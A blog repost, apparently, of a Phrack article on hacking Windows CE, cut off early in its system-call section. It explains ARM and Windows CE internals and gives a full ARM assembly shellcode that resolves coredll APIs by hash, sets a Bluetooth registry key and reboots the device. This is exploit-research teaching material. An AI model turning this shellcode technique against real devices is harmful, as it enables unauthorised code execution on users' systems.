zoukankan      html  css  js  c++  java
  • 摘录Hacking Windows CE

    朋友的文章,虽然对同一系统进行分析但方向不同,很有学习的价值.

    既然是国人写的应当也出个中文版配套阿。对san表示强烈抗议~~!;)



    ==Phrack Inc.==

                  Volume 0x0b, Issue 0x3f, Phile #0x06 of 0x14

    |=----------------------------------------------------------------------=|
    |=----------------------=[ Hacking Windows CE ]=------------------------=|
    |=----------------------------------------------------------------------=|
    |=----------------------=[ san <san@xfocus.org> ]=----------------------=|

    --[ Contents

        1 - Abstract

        2 - Windows CE Overview

        3 - ARM Architecture

        4 - Windows CE Memory Management

        5 - Windows CE Processes and Threads

        6 - Windows CE API Address Search Technology

        7 - The Shellcode for Windows CE

        8 - System Call

        9 - Windows CE Buffer Overflow Exploitation

       10 - About Decoding Shellcode

       11 - Conclusion

       12 - Greetings

       13 - References


    --[ 1 - Abstract

    The network features of PDAs and mobiles are becoming more and more
    powerful, so their related security problems are attracting more and more
    attentions. This paper will show a buffer overflow exploitation example
    in Windows CE. It will cover knowledges about ARM architecture, memory
    management and the features of processes and threads of Windows CE. It
    also shows how to write a shellcode in Windows CE, including knowledges
    about decoding shellcode of Windows CE with ARM processor.


    --[ 2 - Windows CE Overview

    Windows CE is a very popular embedded operating system for PDAs and
    mobiles. As the name, it's developed by Microsoft. Because of the similar
    APIs, the Windows developers can easily develop applications for Windows
    CE. Maybe this is an important reason that makes Windows CE popular.
    Windows CE 5.0 is the latest version, but Windows CE.net(4.2) is the most
    useful version, and this paper is based on Windows CE.net.

    For marketing reason, Windows Mobile Software for Pocket PC and Smartphone
    are considered as independent products, but they are also based on the
    core of Windows CE.

    By default, Windows CE is in little-endian mode and it supports several
    processors.


    --[ 3 - ARM Architecture

    ARM processor is the most popular chip in PDAs and mobiles, almost all of
    the embedded devices use ARM as CPU. ARM processors are typical RISC
    processors in that they implement a load/store architecture. Only load and
    store instructions can access memory. Data processing instructions operate
    on register contents only.

    There are six major versions of ARM architecture. These are denoted by
    the version numbers 1 to 6.

    ARM processors support up to seven processor modes, depending on the
    architecture version. These modes are: User, FIQ-Fast Interrupt Request,
    IRQ-Interrupt Request, Supervisor, Abort, Undefined and System. The System
    mode requires ARM architecture v4 and above. All modes except User mode
    are referred to as privileged mode. Applications usually execute in User
    mode, but on Pocket PC all applications appear to run in kernel mode, and
    we'll talk about it late.

    ARM processors have 37 registers. The registers are arranged in partially
    overlapping banks. There is a different register bank for each processor
    mode. The banked registers give rapid context switching for dealing with
    processor exceptions and privileged operations.

    In ARM architecture v3 and above, there are 30 general-purpose 32-bit
    registers, the program counter(pc) register, the Current Program Status
    Register(CPSR) and five Saved Program Status Registers(SPSRs). Fifteen
    general-purpose registers are visible at any one time, depending on the
    current processor mode. The visible general-purpose registers are from r0
    to r14.

    By convention, r13 is used as a stack pointer(sp) in ARM assembly language.
    The C and C++ compilers always use r13 as the stack pointer.

    In User mode and System mode, r14 is used as a link register(lr) to store
    the return address when a subroutine call is made. It can also be used as
    a general-purpose register if the return address is stored in the stack.

    The program counter is accessed as r15(pc). It is incremented by four
    bytes for each instruction in ARM state, or by two bytes in Thumb state.
    Branch instructions load the destination address into the pc register.

    You can load the pc register directly using data operation instructions.
    This feature is different from other processors and it is useful while
    writing shellcode.


    --[ 4 - Windows CE Memory Management

    Understanding memory management is very important for buffer overflow
    exploit. The memory management of Windows CE is very different from other
    operating systems, even other Windows systems.

    Windows CE uses ROM (read only memory) and RAM (random access memory).

    The ROM stores the entire operating system, as well as the applications
    that are bundled with the system. In this sense, the ROM in a Windows CE
    system is like a small read-only hard disk. The data in ROM can be
    maintained without power of battery. ROM-based DLL files can be designated
    as Execute in Place. XIP is a new feature of Windows CE.net. That is,
    they're executed directly from the ROM instead of being loaded into
    program RAM and then executed. It is a big advantage for embedded systems.
    The DLL code doesn't take up valuable program RAM and it doesn't have to
    be copied into RAM before it's launched. So it takes less time to start an
    application. DLL files that aren't in ROM but are contained in the object
    store or on a Flash memory storage card aren't executed in place; they're
    copied into the RAM and then executed.

    The RAM in a Windows CE system is divided into two areas: program memory
    and object store.

    The object store can be considered something like a permanent virtual RAM
    disk. Unlike the RAM disks on a PC, the object store maintains the files
    stored in it even if the system is turned off. This is the reason that
    Windows CE devices typically have a main battery and a backup battery.
    They provide power for the RAM to maintain the files in the object store.
    Even when the user hits the reset button, the Windows CE kernel starts up
    looking for a previously created object store in RAM and uses that store
    if it finds one.

    Another area of the RAM is used for the program memory. Program memory is
    used like the RAM in personal computers. It stores the heaps and stacks
    for the applications that are running. The boundary between the object
    store and the program RAM is adjustable. The user can move the dividing
    line between object store and program RAM using the System Control Panel
    applet.

    Windows CE is a 32-bit operating system, so it supports 4GB virtual
    address space. The layout is as following:

    +----------------------------------------+ 0xFFFFFFFF
    |   |   |  Kernel Virtual Address:       |
    |   | 2 |  KPAGE Trap Area,              |
    |   | G |  KDataStruct, etc              |
    |   | B |  ...                           |
    |   |   |--------------------------------+ 0xF0000000
    | 4 | K |  Static Mapped Virtual Address |
    | G | E |  ...                           |
    | B | R |  ...                           |
    |   | N |--------------------------------+ 0xC4000000
    | V | E |  NK.EXE                        |
    | I | L |--------------------------------+ 0xC2000000
    | R |   |  ...                           |
    | T |   |  ...                           |
    | U |---|--------------------------------+ 0x80000000
    | A |   |  Memory Mapped Files           |
    | L | 2 |  ...                           |
    |   | G |--------------------------------+ 0x42000000
    | A | B |  Slot 32 Process 32            |
    | D |   |--------------------------------+ 0x40000000
    | D | U |  ...                           |
    | R | S |--------------------------------+ 0x08000000
    | E | E |  Slot 3  DEVICE.EXE            |
    | S | R |--------------------------------+ 0x06000000
    | S |   |  Slot 2  FILESYS.EXE           |
    |   |   |--------------------------------+ 0x04000000
    |   |   |  Slot 1  XIP DLLs              |
    |   |   |--------------------------------+ 0x02000000
    |   |   |  Slot 0  Current Process       |
    +---+---+--------------------------------+ 0x00000000

    The upper 2GB is kernel space, used by the system for its own data. And
    the lower 2GB is user space. From 0x42000000 to below 0x80000000 memories
    are used for large memory allocations, such as memory-mapped files, object
    store is in here. From 0 to below 0x42000000 memories are divided into 33
    slots, each of which is 32MB.

    Slot 0 is very important; it's for the currently running process. The
    virtual address space layout is as following:

    +---+------------------------------------+ 0x02000000
    |   |     DLL Virtual Memory Allocations |
    | S |   +--------------------------------|
    | L |   |  ROM DLLs:R/W Data             |
    | O |   |--------------------------------|
    | T |   |  RAM DLL+OverFlow ROM DLL:     |
    | 0 |   |  Code+Data                     |
    |   |   +--------------------------------|
    | C +------+-----------------------------|
    | U        |                  A          |
    | R        V                  |          |
    | R +-------------------------+----------|
    | E |  General Virtual Memory Allocations|
    | N |   +--------------------------------|
    | T |   |  Process VirtualAlloc() calls  |
    |   |   |--------------------------------|
    | P |   |       Thread Stack             |
    | R |   |--------------------------------|
    | O |   |       Process Heap             |
    | C |   |--------------------------------|
    | E |   |       Thread Stack             |
    | S |---+--------------------------------|
    | S |      Process Code and Data         |
    |   |------------------------------------+ 0x00010000
    |   |    Guard Section(64K)+UserKInfo    |
    +---+------------------------------------+ 0x00000000

    First 64 KB reserved by the OS. The process' code and data are mapped from
    0x00010000, then followed by stacks and heaps. DLLs loaded into the top
    address. One of the new features of Windows CE.net is the expansion of an
    application's virtual address space from 32 MB, in earlier versions of
    Windows CE, to 64 MB, because the Slot 1 is used as XIP.


    --[ 5 - Windows CE Processes and Threads

    Windows CE treats processes in a different way from other Windows systems.
    Windows CE limits 32 processes being run at any one time. When the system
    starts, at least four processes are created: NK.EXE, which provides the
    kernel service, it's always in slot 97; FILESYS.EXE, which provides file
    system service, it's always in slot 2; DEVICE.EXE, which loads and
    maintains the device drivers for the system, it's in slot 3 normally; and
    GWES.EXE, which provides the GUI support, it's in slot 4 normally. The
    other processes are also started, such as EXPLORER.EXE.

    Shell is an interesting process because it's not even in the ROM.
    SHELL.EXE is the Windows CE side of CESH, the command line-based monitor.
    The only way to load it is by connecting the system to the PC debugging
    station so that the file can be automatically downloaded from the PC. When
    you use Platform Builder to debug the Windows CE system, the SHELL.EXE
    will be loaded into the slot after FILESYS.EXE.

    Threads under Windows CE are similar to threads under other Windows
    systems. Each process at least has a primary thread associated with it
    upon starting even if it never explicitly created one. And a process can
    create any number of additional threads, it's only limited by available
    memory.

    Each thread belongs to a particular process and shares the same memory
    space. But SetProcPermissions(-1) gives the current thread access to any
    process. Each thread has an ID, a private stack and a set of registers.
    The stack size of all threads created within a process is set by the
    linker when the application is compiled.

    The IDs of process and thread in Windows CE are the handles of the
    corresponding process and thread. It's funny, but it's useful while
    programming.

    When a process is loaded, system will assign the next available slot to it
    . DLLs loaded into the slot and then followed by the stack and default
    process heap. After this, then executed.

    When a process' thread is scheduled, system will copy from its slot into
    slot 0. It isn't a real copy operation; it seems just mapped into slot 0.
    This is mapped back to the original slot allocated to the process if the
    process becomes inactive. Kernel, file system, windowing system all runs
    in their own slots

    Processes allocate stack for each thread, the default size is 64KB,
    depending on link parameter when the program is compiled. The top 2KB is
    used to guard against stack overflow, we can't destroy this memory,
    otherwise, the system will freeze. And the remained available for use.

    Variables declared inside functions are allocated in the stack. Thread's
    stack memory is reclaimed when it terminates.


    --[ 6 - Windows CE API Address Search Technology

    We must have a shellcode to run under Windows CE before exploit. Windows
    CE implements as Win32 compatibility. Coredll provides the entry points
    for most APIs supported by Windows CE. So it is loaded by every process.
    The coredll.dll is just like the kernel32.dll and ntdll.dll of other Win32
    systems. We have to search necessary API addresses from the coredll.dll
    and then use these APIs to implement our shellcode. The traditional method
    to implement shellcode under other Win32 systems is to locate the base
    address of kernel32.dll via PEB structure and then search API addresses
    via PE header.

    Firstly, we have to locate the base address of the coredll.dll. Is there a
    structure like PEB under Windows CE? The answer is yes. KDataStruct is an
    important kernel structure that can be accessed from user mode using the
    fixed address PUserKData and it keeps important system data, such as
    module list, kernel heap, and API set pointer table (SystemAPISets).

    KDataStruct is defined in nkarm.h:

    // WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\nkarm.h
    struct KDataStruct {
        LPDWORD lpvTls;         /* 0x000 Current thread local storage pointer */
        HANDLE  ahSys[NUM_SYS_HANDLES]; /* 0x004 If this moves, change kapi.h */
        char    bResched;       /* 0x084 reschedule flag */
        char    cNest;          /* 0x085 kernel exception nesting */
        char    bPowerOff;      /* 0x086 TRUE during "power off" processing */
        char    bProfileOn;     /* 0x087 TRUE if profiling enabled */
        ulong   unused;         /* 0x088 unused */
        ulong   rsvd2;          /* 0x08c was DiffMSec */
        PPROCESS pCurPrc;       /* 0x090 ptr to current PROCESS struct */
        PTHREAD pCurThd;        /* 0x094 ptr to current THREAD struct */
        DWORD   dwKCRes;        /* 0x098  */
        ulong   handleBase;     /* 0x09c handle table base address */
        PSECTION aSections[64]; /* 0x0a0 section table for virutal memory */
        LPEVENT alpeIntrEvents[SYSINTR_MAX_DEVICES];/* 0x1a0 */
        LPVOID  alpvIntrData[SYSINTR_MAX_DEVICES];  /* 0x220 */
        ulong   pAPIReturn;     /* 0x2a0 direct API return address for kernel mode */
        uchar   *pMap;          /* 0x2a4 ptr to MemoryMap array */
        DWORD   dwInDebugger;   /* 0x2a8 !0 when in debugger */
        PTHREAD pCurFPUOwner;   /* 0x2ac current FPU owner */
        PPROCESS pCpuASIDPrc;   /* 0x2b0 current ASID proc */
        long    nMemForPT;      /* 0x2b4 - Memory used for PageTables */

        long    alPad[18];      /* 0x2b8 - padding */
        DWORD   aInfo[32];      /* 0x300 - misc. kernel info */
        // WINCE420\PUBLIC\COMMON\OAK\INC\pkfuncs.h
            #define KINX_PROCARRAY  0   /* 0x300 address of process array */
            #define KINX_PAGESIZE   1   /* 0x304 system page size */
            #define KINX_PFN_SHIFT  2   /* 0x308 shift for page # in PTE */
            #define KINX_PFN_MASK   3   /* 0x30c mask for page # in PTE */
            #define KINX_PAGEFREE   4   /* 0x310 # of free physical pages */
            #define KINX_SYSPAGES   5   /* 0x314 # of pages used by kernel */
            #define KINX_KHEAP      6   /* 0x318 ptr to kernel heap array */
            #define KINX_SECTIONS   7   /* 0x31c ptr to SectionTable array */
            #define KINX_MEMINFO    8   /* 0x320 ptr to system MemoryInfo struct */
            #define KINX_MODULES    9   /* 0x324 ptr to module list */
            #define KINX_DLL_LOW   10   /* 0x328 lower bound of DLL shared space */
            #define KINX_NUMPAGES  11   /* 0x32c total # of RAM pages */
            #define KINX_PTOC      12   /* 0x330 ptr to ROM table of contents */
            #define KINX_KDATA_ADDR 13  /* 0x334 kernel mode version of KData */
            #define KINX_GWESHEAPINFO 14 /* 0x338 Current amount of gwes heap in use */
            #define KINX_TIMEZONEBIAS 15 /* 0x33c Fast timezone bias info */
            #define KINX_PENDEVENTS 16  /* 0x340 bit mask for pending interrupt events */
            #define KINX_KERNRESERVE 17 /* 0x344 number of kernel reserved pages */
            #define KINX_API_MASK 18    /* 0x348 bit mask for registered api sets */
            #define KINX_NLS_CP 19      /* 0x34c hiword OEM code page, loword ANSI code page */
            #define KINX_NLS_SYSLOC 20  /* 0x350 Default System locale */
            #define KINX_NLS_USERLOC 21 /* 0x354 Default User locale */
            #define KINX_HEAP_WASTE 22  /* 0x358 Kernel heap wasted space */
            #define KINX_DEBUGGER 23    /* 0x35c For use by debugger for protocol communication */
            #define KINX_APISETS 24     /* 0x360 APIset pointers */
            #define KINX_MINPAGEFREE 25 /* 0x364 water mark of the minimum number of free pages */
            #define KINX_CELOGSTATUS 26 /* 0x368 CeLog status flags */
            #define KINX_NKSECTION  27  /* 0x36c Address of NKSection */
            #define KINX_PWR_EVTS   28  /* 0x370 Events to be set after power on */

            #define KINX_NKSIG     31   /* 0x37c last entry of KINFO -- signature when NK is ready */
            #define NKSIG          0x4E4B5347       /* signature "NKSG" */
                                /* 0x380 - interlocked api code */
                                /* 0x400 - end */
    };  /* KDataStruct */

    /* High memory layout
    *
    * This structure is mapped in at the end of the 4GB virtual
    * address space.
    *
    *  0xFFFD0000 - first level page table (uncached) (2nd half is r/o)
    *  0xFFFD4000 - disabled for protection
    *  0xFFFE0000 - second level page tables (uncached)
    *  0xFFFE4000 - disabled for protection
    *  0xFFFF0000 - exception vectors
    *  0xFFFF0400 - not used (r/o)
    *  0xFFFF1000 - disabled for protection
    *  0xFFFF2000 - r/o (physical overlaps with vectors)
    *  0xFFFF2400 - Interrupt stack (1k)
    *  0xFFFF2800 - r/o (physical overlaps with Abort stack & FIQ stack)
    *  0xFFFF3000 - disabled for protection
    *  0xFFFF4000 - r/o (physical memory overlaps with vectors & intr. stack & FIQ stack)
    *  0xFFFF4900 - Abort stack (2k - 256 bytes)
    *  0xFFFF5000 - disabled for protection
    *  0xFFFF6000 - r/o (physical memory overlaps with vectors & intr. stack)
    *  0xFFFF6800 - FIQ stack (256 bytes)
    *  0xFFFF6900 - r/o (physical memory overlaps with Abort stack)
    *  0xFFFF7000 - disabled
    *  0xFFFFC000 - kernel stack
    *  0xFFFFC800 - KDataStruct
    *  0xFFFFCC00 - disabled for protection (2nd level page table for 0xFFF00000)
    */


    The value of PUserKData is fixed as 0xFFFFC800 on the ARM processor, and
    0x00005800 on other CPUs. The last member of KDataStruct is aInfo. It
    offsets 0x300 from the start address of KDataStruct structure. Member
    aInfo is a DWORD array, there is a pointer to module list in index
    9(KINX_MODULES), and it's defined in pkfuncs.h. So offsets 0x324 from
    0xFFFFC800 is the pointer to the module list.

    Well, let's look at the Module structure. I marked the offsets of the
    Module structure as following:

    // WINCE420\PRIVATE\WINCEOS\COREOS\NK\INC\kernel.h
    typedef struct Module {
        LPVOID      lpSelf;                 /* 0x00 Self pointer for validation */
        PMODULE     pMod;                   /* 0x04 Next module in chain */
        LPWSTR      lpszModName;            /* 0x08 Module name */
        DWORD       inuse;                  /* 0x0c Bit vector of use */
        DWORD       calledfunc;             /* 0x10 Called entry but not exit */
        WORD        refcnt[MAX_PROCESSES];  /* 0x14 Reference count per process*/
        LPVOID      BasePtr;                /* 0x54 Base pointer of dll load (not 0 based) */
        DWORD       DbgFlags;               /* 0x58 Debug flags */
        LPDBGPARAM  ZonePtr;                /* 0x5c Debug zone pointer */
        ulong       startip;                /* 0x60 0 based entrypoint */
        openexe_t   oe;                     /* 0x64 Pointer to executable file handle */
        e32_lite    e32;                    /* 0x74 E32 header */
        // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
          typedef struct e32_lite {           /* PE 32-bit .EXE header               */
              unsigned short  e32_objcnt;     /* 0x74 Number of memory objects            */
              BYTE            e32_cevermajor; /* 0x76 version of CE built for             */
              BYTE            e32_ceverminor; /* 0x77 version of CE built for             */
              unsigned long   e32_stackmax;   /* 0x78 Maximum stack size                  */
              unsigned long   e32_vbase;      /* 0x7c Virtual base address of module      */
              unsigned long   e32_vsize;      /* 0x80 Virtual size of the entire image    */
              unsigned long e32_sect14rva;    /* 0x84 section 14 rva */
              unsigned long e32_sect14size;   /* 0x88 section 14 size */
              struct info e32_unit[LITE_EXTRA]; /* 0x8c  Array of extra info units     */
                // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
                struct info {                       /* Extra information header block      */
                    unsigned long   rva;            /* Virtual relative address of info    */
                    unsigned long   size;           /* Size of information block           */
                }
                // WINCE420\PUBLIC\COMMON\OAK\INC\pehdr.h
                #define EXP             0           /* 0x8c Export table position          */
                #define IMP             1           /* 0x94 Import table position          */
                #define RES             2           /* 0x9c Resource table position        */
                #define EXC             3           /* 0xa4 Exception table position       */
                #define SEC             4           /* 0xac Security table position        */
                #define FIX             5           /* 0xb4 Fixup table position           */

                #define LITE_EXTRA      6           /* Only first 6 used by NK */ 
          } e32_lite, *LPe32_list;
        o32_lite    *o32_ptr;               /* 0xbc  O32 chain ptr */
        DWORD       dwNoNotify;             /* 0xc0  1 bit per process, set if notifications disabled */
        WORD        wFlags;                 /* 0xc4 */
        BYTE        bTrustLevel;            /* 0xc6 */
        BYTE        bPadding;               /* 0xc7 */
        PMODULE     pmodResource;           /* 0xc8 module that contains the resources */
        DWORD       rwLow;                  /* 0xcc base address of RW section for ROM DLL */
        DWORD       rwHigh;                 /* 0xd0 high address RW section for ROM DLL */
        PGPOOL_Q    pgqueue;                /* 0xcc list of the page owned by the module */
    } Module;


    Module structure is defined in kernel.h. The third member of Module
    structure is lpszModName, which is the module name string pointer and it
    offsets 0x08 from the start of the Module structure. The Module name is
    unicode string. The second member of Module structure is pMod, which is an
    address that point to the next module in chain. So we can locate the
    coredll module by comparing the unicode string of its name.

    Offsets 0x74 from the start of Module structure has an e32 member and it
    is an e32_lite structure. Let's look at the e32_lite structure, which
    defined in pehdr.h. In the e32_lite structure, member e32_vbase will tell
    us the virtual base address of the module. It offsets 0x7c from the start
    of Module structure. We else noticed the member of e32_unit[LITE_EXTRA],
    it is an info structure array. LITE_EXTRA is defined to 6 in the head of
    pehdr.h, only the first 6 used by NK and the first is export table position.
    So offsets 0x8c from the start of Module structure is the virtual relative
    address of export table position of the module.

    From now on, we got the virtual base address of the coredll.dll and its
    virtual relative address of export table position.

    I wrote the following small program to list all modules of the system:

    ; SetProcessorMode.s

        AREA    |.text|, CODE, ARM

        EXPORT    |SetProcessorMode|  
    |SetProcessorMode| PROC
        mov     r1, lr     ; different modes use different lr - save it
        msr     cpsr_c, r0 ; assign control bits of CPSR
        mov     pc, r1     ; return

        END

    // list.cpp
    /*
    ...
    01F60000 coredll.dll
    */

    #include "stdafx.h"

    extern "C" void __stdcall SetProcessorMode(DWORD pMode);

    int WINAPI WinMain( HINSTANCE hInstance,
                        HINSTANCE hPrevInstance,
                        LPTSTR    lpCmdLine,
                        int       nCmdShow)
    {
        FILE *fp;
        unsigned int KDataStruct = 0xFFFFC800;
        void *Modules     = NULL,
             *BaseAddress = NULL,
             *DllName     = NULL;
       
    // switch to user mode
    //SetProcessorMode(0x10);

        if ( (fp = fopen("\\modules.txt", "w")) == NULL )
        {
            return 1;
        }

        // aInfo[KINX_MODULES]
        Modules = *( ( void ** )(KDataStruct + 0x324));

        while (Modules) {
            BaseAddress = *( ( void ** )( ( unsigned char * )Modules + 0x7c ) );
            DllName     = *( ( void ** )( ( unsigned char * )Modules + 0x8 ) );

            fprintf(fp, "%08X %ls\n", BaseAddress, DllName);

            Modules = *( ( void ** )( ( unsigned char * )Modules + 0x4 ) );
        }

        fclose(fp);
        return(EXIT_SUCCESS);
    }

    In my environment, the Module structure is 0x8F453128 which in the kernel
    space. Most of Pocket PC ROMs were builded with Enable Full Kernel Mode
    option, so all applications appear to run in kernel mode. The first 5 bits
    of the Psr register is 0x1F when debugging, that means the ARM processor
    runs in system mode. This value defined in nkarm.h:

    // ARM processor modes
    #define USER_MODE   0x10    // 0b10000
    #define FIQ_MODE    0x11    // 0b10001
    #define IRQ_MODE    0x12    // 0b10010
    #define SVC_MODE    0x13    // 0b10011
    #define ABORT_MODE  0x17    // 0b10111
    #define UNDEF_MODE  0x1b    // 0b11011
    #define SYSTEM_MODE 0x1f    // 0b11111

    I wrote a small function in assemble to switch processor mode because the
    EVC doesn't support inline assemble. The program won't get the value of
    BaseAddress and DllName when I switched the processor to user mode. It
    raised a access violate exception.

    I use this program to get the virtual base address of the coredll.dll is
    0x01F60000 without change processor mode. But this address is invalid when
    I use EVC debugger to look into and the valid data is start from
    0x01F61000. I think maybe Windows CE is for the purpose of save memory
    space or time, so it doesn't load the header of dll files.

    Because we've got the virtual base address of the coredll.dll and its
    virtual relative address of export table position, so through repeat
    compare the API name by IMAGE_EXPORT_DIRECTORY structure, we can get the
    API address. IMAGE_EXPORT_DIRECTORY structure is just like other Win32
    system's, which defined in winnt.h:

    // WINCE420\PUBLIC\COMMON\SDK\INC\winnt.h
    typedef struct _IMAGE_EXPORT_DIRECTORY {
        DWORD   Characteristics;        /* 0x00 */
        DWORD   TimeDateStamp;          /* 0x04 */
        WORD    MajorVersion;           /* 0x08 */
        WORD    MinorVersion;           /* 0x0a */
        DWORD   Name;                   /* 0x0c */
        DWORD   Base;                   /* 0x10 */
        DWORD   NumberOfFunctions;      /* 0x14 */
        DWORD   NumberOfNames;          /* 0x18 */
        DWORD   AddressOfFunctions;     // 0x1c RVA from base of image
        DWORD   AddressOfNames;         // 0x20 RVA from base of image
        DWORD   AddressOfNameOrdinals;  // 0x24 RVA from base of image
    } IMAGE_EXPORT_DIRECTORY, *PIMAGE_EXPORT_DIRECTORY;


    --[ 7 - The Shellcode for Windows CE

    There are something to notice before writing shellcode for Windows CE.
    Windows CE uses r0-r3 as the first to fourth parameters of API, if the
    parameters of API larger than four that Windows CE will use stack to store
    the other parameters. So it will be careful to write shellcode, because
    the shellcode will stay in the stack. The test.asm is our shellcode:

    ; Idea from WinCE4.Dust written by Ratter/29A
    ;
    ; API Address Search
    ; san@xfocus.org
    ;
    ; armasm test.asm
    ; link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj 
     
        CODE32

        EXPORT  WinMainCRTStartup

        AREA    .text, CODE, ARM

    test_start

    ; r11 - base pointer
    test_code_start   PROC
        bl      get_export_section

        mov     r2, #4          ; functions number
        bl      find_func

        sub     sp, sp, #0x89, 30 ; weird after buffer overflow

        add     r0, sp, #8
        str     r0, [sp]
        mov     r3, #2
        mov     r2, #0
        adr     r1, key
        mov     r0, #0xA, 2
        mov     lr, pc
        ldr     pc, [r8, #-12] ; RegOpenKeyExW

        mov     r0, #1
        str     r0, [sp, #0xC]
        mov     r3, #4
        str     r3, [sp, #4]
        add     r1, sp, #0xC
        str     r1, [sp]
        ;mov     r2, #0
        adr     r1, val
        ldr     r0, [sp, #8]
        mov     lr, pc
        ldr     pc, [r8, #-8]  ; RegSetValueExW

        ldr     r0, [sp, #8]
        mov     lr, pc
        ldr     pc, [r8, #-4]  ; RegCloseKey

        adr     r0, sf
        ldr     r0, [r0]
        ;ldr     r0, =0x0101003c
        mov     r1, #0
        mov     r2, #0
        mov     r3, #0
        mov     lr, pc
        ldr     pc, [r8, #-16] ; KernelIoControl
      
        ; basic wide string compare
    wstrcmp   PROC
    wstrcmp_iterate
        ldrh    r2, [r0], #2
        ldrh    r3, [r1], #2

        cmp     r2, #0
        cmpeq   r3, #0
        moveq   pc, lr

        cmp     r2, r3
        beq     wstrcmp_iterate

        mov     pc, lr
        ENDP

    ; output:
    ;  r0 - coredll base addr
    ;  r1 - export section addr
    get_export_section   PROC
        mov     r11, lr
        adr     r4, kd
        ldr     r4, [r4]
        ;ldr     r4, =0xffffc800     ; KDataStruct
        ldr     r5, =0x324          ; aInfo[KINX_MODULES]

        add     r5, r4, r5
        ldr     r5, [r5]

        ; r5 now points to first module

        mov     r6, r5
        mov     r7, #0

    iterate
        ldr     r0, [r6, #8]        ; get dll name
        adr     r1, coredll
        bl      wstrcmp             ; compare with coredll.dll

        ldreq   r7, [r6, #0x7c]     ; get dll base
        ldreq   r8, [r6, #0x8c]     ; get export section rva

        add     r9, r7, r8
        beq     got_coredllbase     ; is it what we're looking for?

        ldr     r6, [r6, #4]
        cmp     r6, #0
        cmpne   r6, r5
        bne     iterate             ; nope, go on

    got_coredllbase
        mov     r0, r7
        add     r1, r8, r7          ; yep, we've got imagebase
                                    ; and export section pointer

        mov     pc, r11
        ENDP

    ; r0 - coredll base addr
    ; r1 - export section addr
    ; r2 - function name addr
    find_func   PROC
        adr     r8, fn
    find_func_loop
        ldr     r4, [r1, #0x20]     ; AddressOfNames
        add     r4, r4, r0

        mov     r6, #0              ; counter
      
    find_start
        ldr     r7, [r4], #4
        add     r7, r7, r0          ; function name pointer
        ;mov     r8, r2             ; find function name

        mov     r10, #0
    hash_loop
        ldrb    r9, [r7], #1
        cmp     r9, #0
        beq     hash_end
        add     r10, r9, r10, ROR #7          
        b       hash_loop

    hash_end
        ldr     r9, [r8]
        cmp     r10, r9 ; compare the hash
        addne   r6, r6, #1      
        bne     find_start

        ldr     r5, [r1, #0x24]     ; AddressOfNameOrdinals
        add     r5, r5, r0
        add     r6, r6, r6
        ldrh    r9, [r5, r6]        ; Ordinals
        ldr     r5, [r1, #0x1c]     ; AddressOfFunctions
        add     r5, r5, r0
        ldr     r9, [r5, r9, LSL #2]; function address rva
        add     r9, r9, r0          ; function address

        str     r9, [r8], #4
        subs    r2, r2, #1
        bne     find_func_loop

        mov     pc, lr
        ENDP

    kd  DCB     0x00, 0xc8, 0xff, 0xff ; 0xffffc800
    sf  DCB     0x3c, 0x00, 0x01, 0x01 ; 0x0101003c

    fn  DCB     0xe7, 0x9d, 0x3a, 0x28 ; KernelIoControl
        DCB     0x51, 0xdf, 0xf7, 0x0b ; RegOpenKeyExW
        DCB     0xc0, 0xfe, 0xc0, 0xd8 ; RegSetValueExW
        DCB     0x83, 0x17, 0x51, 0x0e ; RegCloseKey

    key DCB    "S", 0x0, "O", 0x0, "F", 0x0, "T", 0x0, "W", 0x0, "A", 0x0, "R", 0x0, "E", 0x0
        DCB    "\\", 0x0, "\\", 0x0, "W", 0x0, "i", 0x0, "d", 0x0, "c", 0x0, "o", 0x0, "m", 0x0
        DCB    "m", 0x0, "\\", 0x0, "\\", 0x0, "B", 0x0, "t", 0x0, "C", 0x0, "o", 0x0, "n", 0x0
        DCB    "f", 0x0, "i", 0x0, "g", 0x0, "\\", 0x0, "\\", 0x0, "G", 0x0, "e", 0x0, "n", 0x0
        DCB    "e", 0x0, "r", 0x0, "a", 0x0, "l", 0x0, 0x0, 0x0, 0x0, 0x0

    val DCB    "S", 0x0, "t", 0x0, "a", 0x0, "c", 0x0, "k", 0x0, "M", 0x0, "o", 0x0, "d", 0x0
        DCB    "e", 0x0, 0x0, 0x0

    coredll DCB    "c", 0x0, "o", 0x0, "r", 0x0, "e", 0x0, "d", 0x0, "l", 0x0, "l", 0x0
            DCB    ".", 0x0, "d", 0x0, "l", 0x0, "l", 0x0, 0x0, 0x0

        ALIGN   4

        LTORG
    test_end

    WinMainCRTStartup PROC
        b     test_code_start
        ENDP

        END

    This shellcode constructs with three parts. Firstly, it calls the
    get_export_section function to obtain the virtual base address of coredll
    and its virtual relative address of export table position. The r0 and r1
    stored them. Second, it calls the find_func function to obtain the API
    address through IMAGE_EXPORT_DIRECTORY structure and stores the API
    addresses to its own hash value address. The last part is the function
    implement of our shellcode, it changes the register key
    HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and then uses
    KernelIoControl to soft restart the system.

    Windows CE.NET provides BthGetMode and BthSetMode to get and set the
    bluetooth state. But HP IPAQs use the Widcomm stack which has its own API,
    so BthSetMode can't open the bluetooth for IPAQ. Well, there is another
    way to open bluetooth in IPAQs(My PDA is HP1940). Just changing
    HKLM\SOFTWARE\WIDCOMM\General\btconfig\StackMode to 1 and reset the PDA,
    the bluetooth will open after system restart. This method is not pretty,
    but it works.

    Well, let's look at the get_export_section function. Why I commented off
    "ldr r4, =0xffffc800" instruction? We must notice ARM assembly language's
    LDR pseudo-instruction. It can load a register with a 32-bit constant
    value or an address. The instruction "ldr r4, =0xffffc800" will be
    "ldr r4, [pc, #0x108]" in EVC debugger, and the r4 register depends on the
    program. So the r4 register won't get the 0xffffc800 value in shellcode,
    and the shellcode will fail. The instruction "ldr r5, =0x324" will be
    "mov r5, #0xC9, 30" in EVC debugger, its ok when the shellcode is executed
    . The simple solution is to write the large constant value among the
    shellcode, and then use the ADR pseudo-instruction to load the address of
    value to register and then read the memory to register.

    To save size, we can use hash technology to encode the API names. Each API
    name will be encoded into 4 bytes. The hash technology is come from LSD's
    Win32 Assembly Components.

    The compile method is as following:

    armasm test.asm
    link /MACHINE:ARM /SUBSYSTEM:WINDOWSCE test.obj

    You must install the EVC environment first. After this, we can obtain the
    necessary opcodes from EVC debugger or IDAPro or hex editors.


    --[ 8 - System Call

    First, let's look at the implementation of an API in coredll.dll:

    .text:01F75040                 EXPORT PowerOffSystem
